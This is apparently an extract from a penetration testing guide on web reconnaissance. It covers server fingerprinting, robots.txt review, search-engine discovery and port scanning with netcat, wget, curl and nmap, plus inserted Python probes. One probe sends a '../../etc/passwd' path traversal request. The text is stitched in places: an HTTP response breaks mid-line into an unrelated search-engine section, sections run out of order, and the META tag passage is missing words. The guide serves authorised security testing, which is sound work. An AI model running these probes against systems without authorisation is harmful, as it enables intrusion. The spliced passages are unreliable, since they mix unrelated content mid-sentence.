General guidelines: Best Guess: 7.14 Wappalyzer Website: http://wappalyzer.com • Make sure there are no visual markers disclosing the framework • Remove any unnecessary comments (copyrights, bug information, specific framework comments) • Remove META and generator tags • Use the companies own css or js files and do not store those in a 47 Web Application Penetration Testing framework-specific folders • Do not use default scripts on the page or obfuscate them if they must be used. Specific files and folders General guidelines: • Remove any unnecessary or unused files on the server. This implies text files disclosing information about versions and installation too. • Restrict access to other files in order to achieve 404-response when accessing them from outside. This can be done, for example, by modifying htaccess file and adding RewriteCond or RewriteRule there. An example of such restriction for two common WordPress folders is presented below. RewriteCond %{REQUEST_URI} /wp-login\.php$ [OR] RewriteCond %{REQUEST_URI} /wp-admin/$ RewriteRule $ /http://your_website [R=404,L] However, these are not the only ways to restrict access. In order to automate this process, certain framework-specific plugins exist. One example for WordPress is StealthLogin (http://wordpress.org/plugins/ stealth-login-page). Additional approaches General guidelines: [1] Checksum management The purpose of this approach is to beat checksum-based scanners and not let them disclose files by their hashes. Generally, there are two approaches in checksum management: • Change the location of where those files are placed (i.e. move them to another folder, or rename the existing folder) • Modify the contents - even slight modification results in a completely different hash sum, so adding a single byte in the end of the file should not be a big problem. [2] Controlled chaos A funny and effective method that involves adding bogus files and folders from other frameworks in order to fool scanners and confuse an attacker. But be careful not to overwrite existing files and folders and to break the current framework! Map Application Architecture (OTG-INFO-010) Summary The complexity of interconnected and heterogeneous web server infrastructure can include hundreds of web applications and makes configuration management and review a fundamental step in testing and deploying every single application. In fact it takes only a single vulnerability to undermine the security of the entire infrastructure, and even small and seemingly unimportant problems may evolve into severe risks for another application on the same server. To address these problems, it is of utmost importance to perform an in-depth review of configuration and known security issues. Before performing an in-depth review it is necessary to map the network and application architecture. The different elements that make up the infrastructure need to be determined to understand how they interact with a web application and how they affect security. How to Test Map the application architecture The application architecture needs to be mapped through some test to determine what different components are used to build the web application. In small setups, such as a simple CGI-based application, a single server might be used that runs the web server which executes the C, Perl, or Shell CGIs application, and perhaps also the authentication mechanism. On more complex setups, such as an online bank system, multiple servers might be involved. 
These may include a reverse proxy, a frontend web server, an application server and a database server or LDAP server. Each of these servers will be used for different purposes and might be even be divided in different networks with firewalls between them. This creates different DMZs so that access to the web server will not grant a remote user access to the authentication mechanism itself, and so that compromises of the different elements of the architecture can be isolated so that they will not compromise the whole architecture. Getting knowledge of the application architecture can be easy if this information is provided to the testing team by the application developers in document form or through interviews, but can also prove to be very difficult if doing a blind penetration test. In the latter case, a tester will first start with the assumption that there is a simple setup (a single server). Then they will retrieve information from other tests and derive the different elements, question this assumption and extend the architecture map. The tester will start by asking simple questions such as: “Is there a firewalling system protecting the web server?”. This question will be answered based on the results of network scans targeted at the web server and the analysis of whether the network ports of the web server are being filtered in the network edge (no answer or ICMP unreachables are received) or if the server is directly connected to the Internet (i.e. returns RST packets for all non-listening ports). This analysis can be enhanced to determine the type of firewall used based on network packet tests. Is it a stateful firewall or is it an access list filter on a router? How is it configured? Can it be bypassed? Detecting a reverse proxy in front of the web server needs to be done by the analysis of the web server banner, which might directly disclose the existence of a reverse proxy (for example, if ‘WebSEAL’[1] is returned). It can also be determined by obtaining the answers given by the web server to requests and comparing them to the expected answers. For example, some reverse proxies act as “intrusion prevention systems” (or web-shields) by blocking known attacks targeted at the web server. If the web server is known to answer with a 404 message to a request that targets an unavailable page and returns a different error message for some common web attacks like those done by CGI scanners, it might be an indication of a reverse proxy (or an application-level firewall) which is filtering the requests and returning a different error page than the one expected. Another example: if the web server returns a set of available HTTP methods (including TRACE) but the expected methods return errors then there is probably something in between blocking them. In some cases, even the protection system gives itself away: GET /web-console/ServerInfo.jsp%00 HTTP/1.0 HTTP/1.0 200 Pragma: no-cache 48 Web Application Penetration Testing Cache-Control: no-cache Content-Type: text/html Content-Length: 83, in order to return the relevant search results [1]. If the robots. txt file is not updated during the lifetime of the web site, and inline HTML meta tags that instruct robots not to index content have not been used, then it is possible for indexes to contain web content not intended to be included in by the owners. Website owners may use the previously mentioned robots.txt, HTML meta tags, authentication, and tools provided by search engines to remove such content. 
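The reverse proxy and web-shield detection heuristic described above, which compares how the server answers a harmless request for a non-existent page with how it answers a request that resembles a common attack probe, can be sketched in a few lines of Python. The host and the two paths are placeholders; a real test would also diff the full headers and bodies rather than relying on this rough status comparison.

import http.client

HOST = "www.example.com"   # assumed in-scope target

def probe(path):
    conn = http.client.HTTPConnection(HOST, 80, timeout=10)
    conn.request("GET", path)
    resp = conn.getresponse()
    resp.read()          # drain the body; a fuller check would also compare headers and body
    conn.close()
    return resp.status, resp.reason

# A harmless non-existent page versus a request resembling a CGI-scanner probe.
benign = probe("/this-page-should-not-exist-123456")
attack_like = probe("/cgi-bin/test.cgi?id=../../etc/passwd")

print("benign request:     ", benign)
print("attack-like request:", attack_like)
if benign != attack_like:
    print("Different error handling - possibly a reverse proxy, web-shield or IPS in front of the server.")
else:
    print("Same error handling - no obvious sign of an intermediate filtering device.")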
Search operators Using the advanced “site:” search operator, it is possible to restrict search results to a specific domain [2]. Do not limit testing to just one search engine provider as they may generate different results depending on when they crawled content and their own algorithms. Consider using the following search engines: • Baidu • binsearch.info • Bing • Duck Duck Go • ixquick/Startpage • Google • Shodan • PunkSpider Duck Duck Go and ixquick/Startpage provide reduced information leakage about the tester. Google provides the Advanced “cache:” search operator [2], but this is the equivalent to clicking the “Cached” next to each Google Search Result. Hence, the use of the Advanced “site:” Search Operator and then clicking “Cached” is preferred. The Google SOAP Search API supports the doGetCachedPage and the associated doGetCachedPageResponse SOAP Messages [3] to assist with retrieving cached pages. An implementation of this is under development by the OWASP “Google Hacking” Project. PunkSpider is web application vulnerability search engine. It is of little use for a penetration tester doing manual work. However it can be useful as demonstration of easiness of finding vulnerabilities by script-kiddies. Example To find the web content of owasp.org indexed by a typical search engine, the syntax required is: site:owasp.org Test Objectives To understand what sensitive design and configuration information of the application/system/organization is exposed both directly (on the organization’s website) or indirectly (on a third party website). How to Test Use a search engine to search for: • Network diagrams and configurations • Archived posts and emails by administrators and other key staff • Log on procedures and username formats • Usernames and passwords • Error message content • Development, test, UAT and staging versions of the website To display the index.html of owasp.org as cached, the syntax is: cache:owasp.org 29 Web Application Penetration Testing Google Hacking Database The Google Hacking Database is list of useful search queries for Google. Queries are put in several categories: • Footholds • Files containing usernames • Sensitive Directories • Web Server Detection • Vulnerable Files • Vulnerable Servers • Error Messages • Files containing juicy info • Files containing passwords • Sensitive Online Shopping Info Tools [4] FoundStone SiteDigger: http://www.mcafee.com/uk/downloads/ free-tools/sitedigger.aspx [5] Google Hacker: http://yehg.net/lab/pr0js/files.php/googlehacker. zip [6] Stach & Liu’s Google Hacking Diggity Project: http://www.stachliu.com/resources/tools/google-hacking-diggity-project/ [7] PunkSPIDER: http://punkspider.hyperiongray.com/ References Web [1] “Google Basics: Learn how Google Discovers, Crawls, and Serves Web Pages” - https://support.google.com/webmasters/answer/70897 [2] “Operators and More Search Help”: https://support.google.com/ websearch/answer/136861?hl=en [3] “Google Hacking Database”: http://www.exploit-db.com/google-dorks/ Remediation Carefully consider the sensitivity of design and configuration information before it is posted online. Periodically review the sensitivity of existing design and configuration information that is posted online. Fingerprint Web Server (OTG-INFO-002) Summary Web server fingerprinting is a critical task for the penetration tester. Knowing the version and type of a running web server allows testers to determine known vulnerabilities and the appropriate exploits to use during testing. 
There are several different vendors and versions of web servers on the market today. Knowing the type of web server that is being tested significantly helps in the testing process and can also change the course of the test. This information can be derived by sending the web server specific commands and analyzing the output, as each version of web server software may respond differently to these commands. By knowing how each type of web server responds to specific commands and keeping this information in a web server fingerprint database, a penetration tester can send these commands to the web server, analyze the response, and compare it to the database of known signatures. Please note that it usually takes several different commands to accurately identify the web server, as different versions may react similarly to the same command. Rarely do different versions react the same to all HTTP commands. So by sending several different commands, the tester can increase the accuracy of their guess. Test Objectives Find the version and type of a running web server to determine known vulnerabilities and the appropriate exploits to use during testing. How to Test Black Box testing The simplest and most basic form of identifying a web server is to look at the Server field in the HTTP response header. Netcat is used in this experiment. Consider the following HTTP Request-Response: $ nc 202.41.76.251 80 HEAD / HTTP/1.0 HTTP/1.1 200 OK Date: Mon, 16 Jun 2003 02:53:29 GMT Server: Apache/1.3.3 (Unix) (Red Hat/Linux) Last-Modified: Wed, 07 Oct 1998 11:18:14 GMT ETag: “1813-49b-361b4df6” Accept-Ranges: bytes Content-Length: 1179 Connection: close Content-Type: text/html From the Server field, one can understand that the server is likely Apache, version 1.3.3, running on Linux operating system. Four examples of the HTTP response headers are shown below. From an Apache 1.3.23 server: HTTP/1.1 200 OK Date: Sun, 15 Jun 2003 17:10: 49 GMT Server: Apache/1.3.23 Last-Modified: Thu, 27 Feb 2003 03:48: 19 GMT ETag: 32417-c4-3e5d8a83 Accept-Ranges: bytes Content-Length: 196 Connection: close Content-Type: text/HTML 30 Web Application Penetration Testing From a Microsoft IIS 5.0 server: HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Expires: Yours, 17 Jun 2003 01:41: 33 GMT Date: Mon, 16 Jun 2003 01:41: 33 GMT Content-Type: text/HTML Accept-Ranges: bytes Last-Modified: Wed, 28 May 2003 15:32: 21 GMT ETag: b0aac0542e25c31: 89d Content-Length: 7369 From a Netscape Enterprise 4.1 server: HTTP/1.1 200 OK Server: Netscape-Enterprise/4.1 Date: Mon, 16 Jun 2003 06:19: 04 GMT Content-type: text/HTML Last-modified: Wed, 31 Jul 2002 15:37: 56 GMT Content-length: 57 Accept-ranges: bytes Connection: close From a SunONE 6.1 server: HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Tue, 16 Jan 2007 14:53:45 GMT Content-length: 1186 Content-type: text/html Date: Tue, 16 Jan 2007 14:50:31 GMT Last-Modified: Wed, 10 Jan 2007 09:58:26 GMT Accept-Ranges: bytes Connection: close However, this testing methodology is limited in accuracy. There are several techniques that allow a web site to obfuscate or to modify the server banner string. For example one could obtain the following answer: 403 HTTP/1.1 Forbidden Date: Mon, 16 Jun 2003 02:41: 27 GMT Server: Unknown-Webserver/1.0 Connection: close Content-Type: text/HTML; charset=iso-8859-1 In this case, the server field of that response is obfuscated. The tester cannot know what type of web server is running based on such information. 
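The same banner grab can be scripted rather than typed into netcat. The following minimal Python sketch sends a HEAD request and prints the Server field together with the header order (which becomes relevant in the next section); the host name is a placeholder, and as noted above the banner may be obfuscated or removed entirely.

import http.client

def grab_banner(host, port=80):
    conn = http.client.HTTPConnection(host, port, timeout=10)
    conn.request("HEAD", "/")
    resp = conn.getresponse()
    print("Status:", resp.status, resp.reason)
    # The Server field is the most basic data point, but it may be altered or absent.
    print("Server:", resp.getheader("Server", "<not disclosed>"))
    # The order of the response headers is itself a fingerprinting hint (see Protocol Behavior below).
    print("Header order:", [name for name, _ in resp.getheaders()])
    conn.close()

if __name__ == "__main__":
    grab_banner("www.example.com")   # placeholder target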
Protocol Behavior More refined techniques take in consideration various characteristics of the several web servers available on the market. Below is a list of some methodologies that allow testers to deduce the type of web server in use. HTTP header field ordering The first method consists of observing the ordering of the several headers in the response. Every web server has an inner ordering of the header. Consider the following answers as an example: Response from Apache 1.3.23 $ nc apache.example.com 80 HEAD / HTTP/1.0 HTTP/1.1 200 OK Date: Sun, 15 Jun 2003 17:10: 49 GMT Server: Apache/1.3.23 Last-Modified: Thu, 27 Feb 2003 03:48: 19 GMT ETag: 32417-c4-3e5d8a83 Accept-Ranges: bytes Content-Length: 196 Connection: close Content-Type: text/HTML Response from IIS 5.0 $ nc iis.example.com 80 HEAD / HTTP/1.0 HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Content-Location: http://iis.example.com/Default.htm Date: Fri, 01 Jan 1999 20:13: 52 GMT Content-Type: text/HTML Accept-Ranges: bytes Last-Modified: Fri, 01 Jan 1999 20:13: 52 GMT ETag: W/e0d362a4c335be1: ae1 Content-Length: 133 Response from Netscape Enterprise 4.1 $ nc netscape.example.com 80 HEAD / HTTP/1.0 HTTP/1.1 200 OK Server: Netscape-Enterprise/4.1 Date: Mon, 16 Jun 2003 06:01: 40 GMT Content-type: text/HTML Last-modified: Wed, 31 Jul 2002 15:37: 56 GMT Content-length: 57 Accept-ranges: bytes Connection: close 31 Web Application Penetration Testing Response from a SunONE 6.1 $ nc sunone.example.com 80 HEAD / HTTP/1.0 HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Tue, 16 Jan 2007 15:23:37 GMT Content-length: 0 Content-type: text/html Date: Tue, 16 Jan 2007 15:20:26 GMT Last-Modified: Wed, 10 Jan 2007 09:58:26 GMT Connection: close We can notice that the ordering of the Date field and the Server field differs between Apache, Netscape Enterprise, and IIS. Malformed requests test Another useful test to execute involves sending malformed requests or requests of nonexistent pages to the server. Consider the following HTTP responses. Response from Apache 1.3.23 $ nc apache.example.com 80 GET / HTTP/3.0 HTTP/1.1 400 Bad Request Date: Sun, 15 Jun 2003 17:12: 37 GMT Server: Apache/1.3.23 Connection: close Transfer: chunked Content-Type: text/HTML; charset=iso-8859-1 Response from IIS 5.0 $ nc iis.example.com 80 GET / HTTP/3.0 HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Content-Location: http://iis.example.com/Default.htm Date: Fri, 01 Jan 1999 20:14: 02 GMT Content-Type: text/HTML Accept-Ranges: bytes Last-Modified: Fri, 01 Jan 1999 20:14: 02 GMT ETag: W/e0d362a4c335be1: ae1 Content-Length: 133 Response from Netscape Enterprise 4.1 $ nc netscape.example.com 80 GET / HTTP/3.0 HTTP/1.1 505 HTTP Version Not Supported Server: Netscape-Enterprise/4.1 Date: Mon, 16 Jun 2003 06:04: 04 GMT Content-length: 140 Content-type: text/HTML Connection: close Response from a SunONE 6.1 $ nc sunone.example.com 80 GET / HTTP/3.0 HTTP/1.1 400 Bad request Server: Sun-ONE-Web-Server/6.1 Date: Tue, 16 Jan 2007 15:25:00 GMT Content-length: 0 Content-type: text/html Connection: close We notice that every server answers in a different way. The answer also differs in the version of the server. Similar observations can be done we create requests with a non-existent HTTP method/verb. 
Consider the following responses:

Response from Apache 1.3.23
$ nc apache.example.com 80
GET / JUNK/1.0
HTTP/1.1 200 OK
Date: Sun, 15 Jun 2003 17:17:47 GMT
Server: Apache/1.3.23
Last-Modified: Thu, 27 Feb 2003 03:48:19 GMT
ETag: 32417-c4-3e5d8a83
Accept-Ranges: bytes
Content-Length: 196
Connection: close
Content-Type: text/HTML

Response from IIS 5.0
$ nc iis.example.com 80
GET / JUNK/1.0
HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Fri, 01 Jan 1999 20:14:34 GMT
Content-Type: text/HTML
Content-Length: 87

Response from Netscape Enterprise 4.1
$ nc netscape.example.com 80
GET / JUNK/1.0
Bad request
Bad request
Your browser sent to query this server could not understand.

Response from a SunONE 6.1
$ nc sunone.example.com 80
GET / JUNK/1.0
Bad request
Bad request
Your browser sent a query this server could not understand.

Tools
• httprint - http://net-square.com/httprint.html
• httprecon - http://www.computec.ch/projekte/httprecon/
• Netcraft - http://www.netcraft.com
• Desenmascarame - http://desenmascara.me

Automated Testing
Rather than rely on manual banner grabbing and analysis of the web server headers, a tester can use automated tools to achieve the same results. There are many tests to carry out in order to accurately fingerprint a web server. Luckily, there are tools that automate these tests. “httprint” is one such tool. httprint uses a signature dictionary that allows it to recognize the type and the version of the web server in use. An example of running httprint is shown below.

Online Testing
Online tools can be used if the tester wishes to test more stealthily and doesn’t wish to directly connect to the target website. An example of an online tool that often delivers a lot of information about target web servers is Netcraft. With this tool we can retrieve information about the operating system, the web server used, the server uptime, the netblock owner, and the history of changes related to the web server and the operating system. An example is shown below.

The OWASP Unmaskme Project is expected to become another online tool for fingerprinting any website, with an overall interpretation of all the web metadata extracted. The idea behind this project is that anyone in charge of a website could test the metadata the site is showing to the world and assess it from a security point of view. While this project is still being developed, you can test a Spanish Proof of Concept of this idea.

References
Whitepapers
• Saumil Shah: “An Introduction to HTTP fingerprinting” - http://www.net-square.com/httprint_paper.html
• Anant Shrivastava: “Web Application Finger Printing” - http://anantshri.info/articles/web_app_finger_printing.html

Remediation
Protect the presentation layer web server behind a hardened reverse proxy. Obfuscate the presentation layer web server headers.
• Apache
• IIS

Review Webserver Metafiles for Information Leakage (OTG-INFO-003)
Summary
This section describes how to test the robots.txt file for information leakage of the web application’s directory or folder path(s). Furthermore, the list of directories that are to be avoided by Spiders, Robots, or Crawlers can also be created as a dependency for Map execution paths through application (OTG-INFO-007).

Test Objectives
1. Information leakage of the web application’s directory or folder path(s).
2. Create the list of directories that are to be avoided by Spiders, Robots, or Crawlers.

How to Test
robots.txt
Web Spiders, Robots, or Crawlers retrieve a web page and then recursively traverse hyperlinks to retrieve further web content. Their accepted behavior is specified by the Robots Exclusion Protocol of the robots.txt file in the web root directory [1]. As an example, the beginning of the robots.txt file from http://www.google.com/robots.txt sampled on 11 August 2013 is quoted below:

User-agent: *
Disallow: /search
Disallow: /sdch
Disallow: /groups
Disallow: /images
Disallow: /catalogs
...

The User-Agent directive refers to the specific web spider/robot/crawler. For example, “User-Agent: Googlebot” refers to the spider from Google, while “User-Agent: bingbot”[1] refers to the crawler from Microsoft/Yahoo!. “User-Agent: *” in the example above applies to all web spiders/robots/crawlers [2], as quoted below:

User-agent: *

The Disallow directive specifies which resources are prohibited by spiders/robots/crawlers. In the example above, directories such as the following are prohibited:

...
Disallow: /search
Disallow: /sdch
Disallow: /groups
Disallow: /images
Disallow: /catalogs
...
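Retrieval and parsing of robots.txt can also be scripted. The sketch below is a minimal Python example with a placeholder target URL: it downloads robots.txt and prints each Disallow entry as a candidate path for the testing spreadsheet. The equivalent wget and curl commands are shown below.

import urllib.request
from urllib.parse import urljoin

BASE = "http://www.example.com/"          # example target

def disallowed_paths(base):
    with urllib.request.urlopen(urljoin(base, "/robots.txt"), timeout=10) as resp:
        lines = resp.read().decode(errors="ignore").splitlines()
    paths = []
    for line in lines:
        line = line.split("#", 1)[0].strip()           # drop comments
        if line.lower().startswith("disallow:"):
            value = line.split(":", 1)[1].strip()
            if value:
                paths.append(value)
    return paths

if __name__ == "__main__":
    for path in disallowed_paths(BASE):
        # Each entry is a directory or file the owner did not want indexed,
        # and therefore a candidate entry in the testing spreadsheet.
        print(urljoin(BASE, path))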
Web spiders/robots/crawlers can intentionally ignore the Disallow directives specified in a robots.txt file [3], such as those from Social Networks[2] to ensure that shared linked are still valid. Hence, robots.txt should not be considered as a mechanism to enforce restrictions on how web content is accessed, stored, or republished by third parties. cmlh$ wget http://www.google.com/robots.txt --2013-08-11 14:40:36-- http://www.google.com/robots.txt Resolving www.google.com... 74.125.237.17, 74.125.237.18, 74.125.237.19, ... Connecting to www.google.com|74.125.237.17|:80... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [text/plain] Saving to: ‘robots.txt.1’ [ <=> ] 7,074 --.-K/s in 0s 2013-08-11 14:40:37 (59.7 MB/s) - ‘robots.txt’ saved [7074] cmlh$ head -n5 robots.txt User-agent: * Disallow: /search Disallow: /sdch Disallow: /groups Disallow: /images cmlh$ cmlh$ curl -O http://www.google.com/robots.txt % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 101 7074 0 7074 0 0 9410 0 --:--:-- --:--:-- --:--:-27312 cmlh$ head -n5 robots.txt User-agent: * Disallow: /search Disallow: /sdch Disallow: /groups Disallow: /images cmlh$ robots.txt in webroot - with rockspider “rockspider”[3] automates the creation of the initial scope for Spiders/ Robots/Crawlers of files and directories/folders of a web site. For example, to create the initial scope based on the Allowed: directive from www.google.com using “rockspider”[4]: cmlh$ ./rockspider.pl -www www.google.com “Rockspider” Alpha v0.1_2 robots.txt in webroot - with “wget” or “curl” Copyright 2013 Christian Heinrich Licensed under the Apache License, Version 2.0 The robots.txt file is retrieved from the web root directory of the web server. For example, to retrieve the robots.txt from www.google.com using “wget” or “curl”: 1. Downloading http://www.google.com/robots.txt 34 Web Application Penetration Testing 2. “robots.txt” saved as “www.google.com-robots.txt” 3. Sending Allow: URIs of www.google.com to web proxy i.e. 127.0.0.1:8080 /catalogs/about sent /catalogs/p? sent /news/directory sent ... 4. Done. cmlh$ Analyze robots.txt using Google Webmaster Tools Web site owners can use the Google “Analyze robots.txt” function to analyse the website as part of its “Google Webmaster Tools” (https:// www.google.com/webmasters/tools). This tool can assist with testing and the procedure is as follows: 1. Sign into Google Webmaster Tools with a Google account. 2. On the dashboard, write the URL for the site to be analyzed. 3. Choose between the available methods and follow the on screen instruction. META Tag tags are located within the HEAD section of each HTML Document and should be consistent across a web site in the likely event that the robot/spider/crawler start point does not begin from a document link other than webroot i.e. a “deep link”[5]. If there is no “” entry then the “Robots Exclusion Protocol” defaults to “INDEX,FOLLOW” respectively. Therefore, the other two valid entries defined by the “Robots Exclusion Protocol” are prefixed with “NO...” i.e. “NOINDEX” and “NOFOLLOW”. Web spiders/robots/crawlers can intentionally ignore the “ Tags should not be considered the primary mechanism, rather a complementary control to robots.txt. Tags - with Burp Based on the Disallow directive(s) listed within the robots.txt file in webroot, a regular expression search for “ Tag specified by the “Robots Exclusion Protocol” yet “Disallow: /ac.php” is listed in robots.txt. 
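The robots META tag review described above can also be done without Burp by parsing the HTML directly. The following sketch uses only the Python standard library and a placeholder URL, and prints the content of any META robots tag it finds; remember that the absence of such a tag implies the default INDEX,FOLLOW behavior.

import urllib.request
from html.parser import HTMLParser

class RobotsMetaParser(HTMLParser):
    def handle_starttag(self, tag, attrs):
        if tag.lower() != "meta":
            return
        attrs = {k.lower(): (v or "") for k, v in attrs}
        if attrs.get("name", "").lower() == "robots":
            # e.g. "NOINDEX, NOFOLLOW"; compare this against the Disallow entries in robots.txt
            print("META robots:", attrs.get("content", ""))

url = "http://www.example.com/"     # example page to review
with urllib.request.urlopen(url, timeout=10) as resp:
    RobotsMetaParser().feed(resp.read().decode(errors="ignore"))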
Tools • Browser (View Source function) • curl • wget • rockspider[7] References Whitepapers [1] “The Web Robots Pages” - http://www.robotstxt.org/ [2] “Block and Remove Pages Using a robots.txt File” - https://support. google.com/webmasters/answer/156449 [3] “(ISC)2 Blog: The Attack of the Spiders from the Clouds” - http:// blog.isc2.org/isc2_blog/2008/07/the-attack-of-t.html [4] “Telstra customer database exposed” - http://www.smh. com.au/it-pro/security-it/telstra-customer-database-exposed-20111209-1on60.html Enumerate Applications on Webserver (OTG-INFO-004) Summary A paramount step in testing for web application vulnerabilities is to find out which particular applications are hosted on a web server. Many applications have known vulnerabilities and known attack strategies that can be exploited in order to gain remote control or to exploit data. In addition, many applications are often misconfigured or not updated, due to the perception that they are only used “internally” and therefore no threat exists. With the proliferation of virtual web servers, the traditional 1:1-type relationship between an IP address and a web server is losing much of its original significance. It is not uncommon to have multiple web sites or applications whose symbolic names resolve to the same IP address. This scenario is not limited to hosting environments, but also applies to ordinary corporate environments as well. Security professionals are sometimes given a set of IP addresses as a target to test. It is arguable that this scenario is more akin to a penetration test-type engagement, but in any case it is expected that such an assignment would test all web applications accessible through this target. The problem is that the given IP address hosts an HTTP service on port 80, but if a tester should access it by specifying the IP address (which is all they know) it reports “No web server configured at this address” or a similar message. But that system could “hide” a number of web applications, associated to unrelated symbolic (DNS) names. Obviously, the extent of the analysis is deeply affected by the tester tests all applications or only tests the applications that they are aware of. Sometimes, the target specification is richer. The tester may be given a list of IP addresses and their corresponding symbolic names. Nevertheless, this list might convey partial information, i.e., it could omit some symbolic names and the client may not even being aware of that (this is more likely to happen in large organizations). Other issues affecting the scope of the assessment are represented by web applications published at non-obvious URLs (e.g., http://www. example.com/some-strange-URL), which are not referenced else- 35 Web Application Penetration Testing where. This may happen either by error (due to misconfigurations), or intentionally (for example, unadvertised administrative interfaces). To address these issues, it is necessary to perform web application discovery. Test Objectives Enumerate the applications within scope that exist on a web server How to Test Black Box Testing Web application discovery is a process aimed at identifying web applications on a given infrastructure. The latter is usually specified as a set of IP addresses (maybe a net block), but may consist of a set of DNS symbolic names or a mix of the two. This information is handed out prior to the execution of an assessment, be it a classic-style penetration test or an application-focused assessment. 
In both cases, unless the rules of engagement specify otherwise (e.g., “test only the application located at the URL http://www.example.com/”), the assessment should strive to be the most comprehensive in scope, i.e. it should identify all the applications accessible through the given target. The following examples examine a few techniques that can be employed to achieve this goal. Note: Some of the following techniques apply to Internet-facing web servers, namely DNS and reverse-IP web-based search services and the use of search engines. Examples make use of private IP addresses (such as 192.168.1.100), which, unless indicated otherwise, represent generic IP addresses and are used only for anonymity purposes. There are three factors influencing how many applications are related to a given DNS name (or an IP address): 1. Different base URL The obvious entry point for a web application is www.example. com, i.e., with this shorthand notation we think of the web application originating at http://www.example.com/ (the same applies for https). However, even though this is the most common situation, there is nothing forcing the application to start at “/”. For example, the same symbolic name may be associated to three web applications such as: http://www.example.com/url1 http:// www.example.com/url2 http://www.example.com/url3 In this case, the URL http://www.example.com/ would not be associated with a meaningful page, and the three applications would be “hidden”, unless the tester explicitly knows how to reach them, i.e., the tester knows url1, url2 or url3. There is usually no need to publish web applications in this way, unless the owner doesn’t want them to be accessible in a standard way, and is prepared to inform the users about their exact location. This doesn’t mean that these applications are secret, just that their existence and location is not explicitly advertised. 2. Non-standard ports While web applications usually live on port 80 (http) and 443 (https), there is nothing magic about these port numbers. In fact, web applications may be associated with arbitrary TCP ports, and can be referenced by specifying the port number as follows: http[s]://www. example.com:port/. For example, http://www.example.com:20000/. 3. Virtual hosts DNS allows a single IP address to be associated with one or more symbolic names. For example, the IP address 192.168.1.100 might be associated to DNS names www.example.com, helpdesk.example. com, webmail.example.com. It is not necessary that all the names belong to the same DNS domain. This 1-to-N relationship may be reflected to serve different content by using so called virtual hosts. The information specifying the virtual host we are referring to is embedded in the HTTP 1.1 Host: header [1]. One would not suspect the existence of other web applications in addition to the obvious www.example.com, unless they know of helpdesk.example.com and webmail.example.com. Approaches to address issue 1 - non-standard URLs There is no way to fully ascertain the existence of non-standardnamed web applications. Being non-standard, there is no fixed criteria governing the naming convention, however there are a number of techniques that the tester can use to gain some additional insight. First, if the web server is mis-configured and allows directory browsing, it may be possible to spot these applications. Vulnerability scanners may help in this respect. 
Second, these applications may be referenced by other web pages and there is a chance that they have been spidered and indexed by web search engines. If testers suspect the existence of such “hidden” applications on www.example.com they could search using the site operator and examine the result of a query for “site:www.example.com”. Among the returned URLs there could be one pointing to such a non-obvious application.

Another option is to probe for URLs which might be likely candidates for non-published applications. For example, a web mail front end might be accessible from URLs such as https://www.example.com/webmail, https://webmail.example.com/, or https://mail.example.com/. The same holds for administrative interfaces, which may be published at hidden URLs (for example, a Tomcat administrative interface), and yet not referenced anywhere. So doing a bit of dictionary-style searching (or “intelligent guessing”) could yield some results. Vulnerability scanners may help in this respect.

Approaches to address issue 2 - non-standard ports
It is easy to check for the existence of web applications on non-standard ports. A port scanner such as nmap [2] is capable of performing service recognition by means of the -sV option, and will identify http[s] services on arbitrary ports. What is required is a full scan of the whole 64k TCP port address space. For example, the following command will look up, with a TCP connect scan, all open ports on IP 192.168.1.100 and will try to determine what services are bound to them (only essential switches are shown – nmap features a broad set of options, whose discussion is out of scope):

nmap –PN –sT –sV –p0-65535 192.168.1.100

It is sufficient to examine the output and look for http or the indication of SSL-wrapped services (which should be probed to confirm that they are https). For example, the output of the previous command could look like:

Interesting ports on 192.168.1.100:
(The 65527 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.5p1 (protocol 1.99)
80/tcp open http Apache httpd 2.0.40 ((Red Hat Linux))
443/tcp open ssl OpenSSL
901/tcp open http Samba SWAT administration server
1241/tcp open ssl Nessus security scanner
3690/tcp open unknown
8000/tcp open http-alt?
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1

From this example, one can see that:
• There is an Apache http server running on port 80.
• It looks like there is an https server on port 443 (but this needs to be confirmed, for example, by visiting https://192.168.1.100 with a browser).
• On port 901 there is a Samba SWAT web interface.
• The service on port 1241 is not https, but is the SSL-wrapped Nessus daemon.
• Port 3690 features an unspecified service (nmap gives back its fingerprint - here omitted for clarity - together with instructions to submit it for incorporation in the nmap fingerprint database, provided you know which service it represents).
• There is another unspecified service on port 8000; this might possibly be http, since it is not uncommon to find http servers on this port. Examining this port directly, for example by issuing a simple GET / HTTP/1.0 request with netcat or telnet, returns a valid HTTP response and confirms that it is in fact an HTTP server. Alternatively, testers could have visited the URL with a web browser, or used the GET or HEAD Perl commands, which mimic HTTP interactions (however, HEAD requests may not be honored by all servers).
• Apache Tomcat is running on port 8080.
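Confirming that a candidate port such as 8000 really speaks HTTP can also be done with a few lines of code instead of netcat or the Perl GET and HEAD commands. The host and port list below are placeholders taken from the example output above, and as already noted some servers do not honor HEAD requests.

import http.client

def looks_like_http(host, port):
    conn = http.client.HTTPConnection(host, port, timeout=5)
    try:
        conn.request("HEAD", "/")
        resp = conn.getresponse()
        print(f"{host}:{port} answered HTTP {resp.status} {resp.reason}, "
              f"Server: {resp.getheader('Server', '<none>')}")
        return True
    except (OSError, http.client.HTTPException) as exc:
        print(f"{host}:{port} does not appear to speak plain HTTP ({exc})")
        return False
    finally:
        conn.close()

if __name__ == "__main__":
    for port in (8000, 8080, 901):          # candidate ports from the scan output above
        looks_like_http("192.168.1.100", port)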
